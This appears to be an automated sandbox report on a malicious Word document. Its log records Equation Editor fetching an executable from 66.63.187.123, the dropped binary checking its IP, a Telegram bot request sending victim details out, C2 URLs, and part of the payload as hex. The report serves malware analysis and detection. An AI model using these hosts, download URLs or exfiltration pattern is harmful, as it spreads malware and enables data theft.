                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Fri, 27 Sep 2024 14:00:37 GMTContent-Type: application/x-msdos-programContent-Length: 673280Connection: keep-aliveLast-Modified: Fri, 27 Sep 2024 03:14:38 GMTETag: "a4600-6231141618562"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 22 f6 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 0a 00 00 08 00 00 00 00 00 00 ee 5a 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 5a 0a 00 57 00 00 00 00 60 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 3a 0a 00 00 20 00 00 00 3c 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 60 0a 00 00 06 00 00 00 3e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0a 00 00 02 00 00 00 44 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 5a 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 5c 1b 0a 00 38 3f 00 00 03 00 00 00 2e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 03 00 41 00 00 00 00 00 00 00 20 70 02 00 00 8d 01 00 00 01 25 d0 39 00 00 04 28 01 00 00 0a 80 3a 00 00 04 20 56 01 00 00 8d 01 00 00 01 25 d0 46 00 00 04 28 01 00 00 0a 80 47 00 00 04 28 2f 00 00 06 2a d0 01 00 00 06 26 2a 00 00 00 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 00 00 00 13 30 05 00 68 00 00 00 00 00 00 00 02 1f 0a 8d 0a 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 01 00 00 70 a2 25 18 72 01 00 00 70 a2 25 19 72 01 00 00 70 a2 25 1a 72 01 00 00 70 a2 25 1b 72 01 00 00 70 a2 25 1c 72 01 00 00 70 a2 25 1d 72 01 00 00 70 a2 25 1e 72 01 00 00 70 a2 25 1f 09 72 01 00 00 70 a2 7d 01 00 00 04 2b 00 02 28 05 00 00 0a 00 2a 36 28 2f 00 00 06 2a d0 05 00 00 06 26 2a 00 00 13 30 03 00 cd 00 00 00 01 00 00 11 7e 47 00 00 04 13 06 2b 3e 11 05 45 0b 00 00 00 60 00 00 00 00 00 00 00 45 00 00 00 35 00 00 00 45 00 00 00 87 00 00 00 0b 00 00 00 89 00 00 00 1c 00 00 00 60 00 00 00 45 00 00 00 d0 06 00 00 06 26 1c 13 05 2b c2 16 0a
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%209/27/2024%20/%2011:31:56%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 66.63.187.123 66.63.187.123
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49170 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49169 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49171 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49183 -> 188.114.97.3:443
                  Source: global trafficHTTP traffic detected: GET /txt/millizxc.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 66.63.187.123Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /txt/H363BpKqz0MdVd7.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E869B705-8442-482B-ACFD-8A589F7F3952}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%209/27/2024%20/%2011:31:56%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /txt/millizxc.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 66.63.187.123Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /txt/H363BpKqz0MdVd7.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 27 Sep 2024 14:01:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: txt on 66.63.187.123.url.0.drString found in binary or memory: http://66.63.187.123/txt/
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000003.422853483.000000000068B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.422892150.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000068C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exe
                  Source: EQNEDT32.EXE, 00000009.00000003.422853483.000000000068B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000068C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exeC:
                  Source: EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exej
                  Source: EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exettC:
                  Source: millizxc.doc.url.0.drString found in binary or memory: http://66.63.187.123/txt/millizxc.doc
                  Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002442000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002520000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: millitingacy20306.exe, 0000000D.00000002.952374182.00000000058C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: millitingacy20306.exe, 0000000D.00000002.952374182.00000000058C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
